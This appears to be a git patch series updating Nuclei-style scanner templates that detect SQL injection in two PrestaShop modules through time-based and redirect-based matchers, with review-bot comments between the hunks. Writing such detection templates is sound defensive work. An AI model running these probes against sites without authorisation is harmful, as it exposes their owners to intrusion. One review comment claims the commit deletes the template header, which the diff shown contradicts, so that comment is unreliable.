blind-based + dsl: + - 'status_code_2 == 200 && contains(body_2, "tvcmsblog")' + - 'status_code_2 == 200 && status_code_3 == 302' condition: and From 54817fd3fc4a232eca7e6ccff1a998e733b34efb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 19 Sep 2024 12:20:28 +0400 Subject: [PATCH 10/11] Update CVE-2024-36683.yaml --- http/cves/2024/CVE-2024-36683.yaml | 22 +++++++++++++++++++--- 1 file changed, 19 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-36683.yaml b/http/cves/2024/CVE-2024-36683.yaml index b0699514ed..c0134d65e5 100644 --- a/http/cves/2024/CVE-2024-36683.yaml +++ b/http/cves/2024/CVE-2024-36683.yaml @@ -26,7 +26,24 @@ info: fofa-query: body="/productsalert" tags: cve,cve2023,prestashop,sqli,productsalert +flow: http(1) && http(2) + http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 3 + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(tolower(body), "productsalert", "prestashop")' + condition: and + internal: true + - raw: - | @timeout: 30s @@ -50,6 +67,5 @@ http: - type: dsl name: time-based dsl: - - 'duration_1>=5 || duration_2>=5' - - 'contains_all(tolower(response), "productsalert", "prestashop")' - condition: and + - 'duration_1>=5' + - 'duration_2>=5' From f42e20e723a968bad66095e3d099550763afd34c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 19 Sep 2024 12:22:48 +0400 Subject: [PATCH 11/11] Update CVE-2023-39650.yaml --- http/cves/2023/CVE-2023-39650.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) diff --git a/http/cves/2023/CVE-2023-39650.yaml b/http/cves/2023/CVE-2023-39650.yaml index c6f686962e..c2161a9f50 100644 --- a/http/cves/2023/CVE-2023-39650.yaml +++ b/http/cves/2023/CVE-2023-39650.yaml 
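Review bot: After this commit CVE-2023-39650.yaml has no `id:` or `info:` block at all — the hunk removes the whole header down to `tags:` and keeps only `http:` — so the file carries no id, name, severity or classification and would be rejected at load time; PATCH 11 adds the block back, but the intermediate commit is broken and the deletion looks unintended. The restored three-request design also reverts `SLEEP(6)` to `SLEEP(5)` and `duration>=6` to `duration_1>=5`, and re-adds the `Origin: {{BaseURL}}` header that PATCH 04 removed, with a commit message ('Update CVE-2023-39650.yaml') that gives no reason for either reversal; a sentence explaining why the single-request version was abandoned would help the next maintainer. The blind-based clause `status_code_2 == 200 && status_code_3 == 302` again rests on a redirect as the only difference oracle.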
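Review bot: The restored `flow: http(1) && http(2)` adds a third request to CVE-2024-36683.yaml while `max-request: 2` (added in PATCH 06, above this hunk) is left untouched; it should become `max-request: 3`. The rewritten time-based matcher lists `duration_1>=5` and `duration_2>=5` with no `condition`, so the engine default decides how they combine, and the `contains_all(tolower(response), ...)` clause is gone, leaving latency as the only signal after a precheck that accepts any page mentioning `prestashop`; writing `condition: or` explicitly and keeping a content clause would make both the intent and the evidence explicit. The context line `tags: cve,cve2023,prestashop,sqli,productsalert` still carries the wrong year tag.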
@@ -1,3 +1,30 @@ +id: CVE-2023-39650 + +info: + name: PrestaShop Theme Volty CMS Blog - SQL Injection + author: mastercho + severity: critical + description: | + In the module 'Theme Volty CMS Blog' (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. + reference: + - https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-39650 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-39650 + cwe-id: CWE-89 + epss-score: 0.04685 + epss-percentile: 0.91818 + metadata: + max-request: 1 + verified: true + framework: prestashop + shodan-query: html:"/tvcmsblog" + tags: cve,cve2023,prestashop,sqli,tvcmsblog + http: - raw: - |
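Review bot: The restored metadata says `max-request: 1`, but since PATCH 09 the `http:` section of this file sends three raw requests, so the value should be `max-request: 3`. The `impact:` paragraph comes back with the same `accessand` typo; it should read `unauthorized access and data leakage`. `verified: true` is restored as well, although the request design it was recorded against (the single `SLEEP(6)` request from PATCH 04) was replaced in PATCH 09; re-verifying the three-request version before keeping that flag would be prudent.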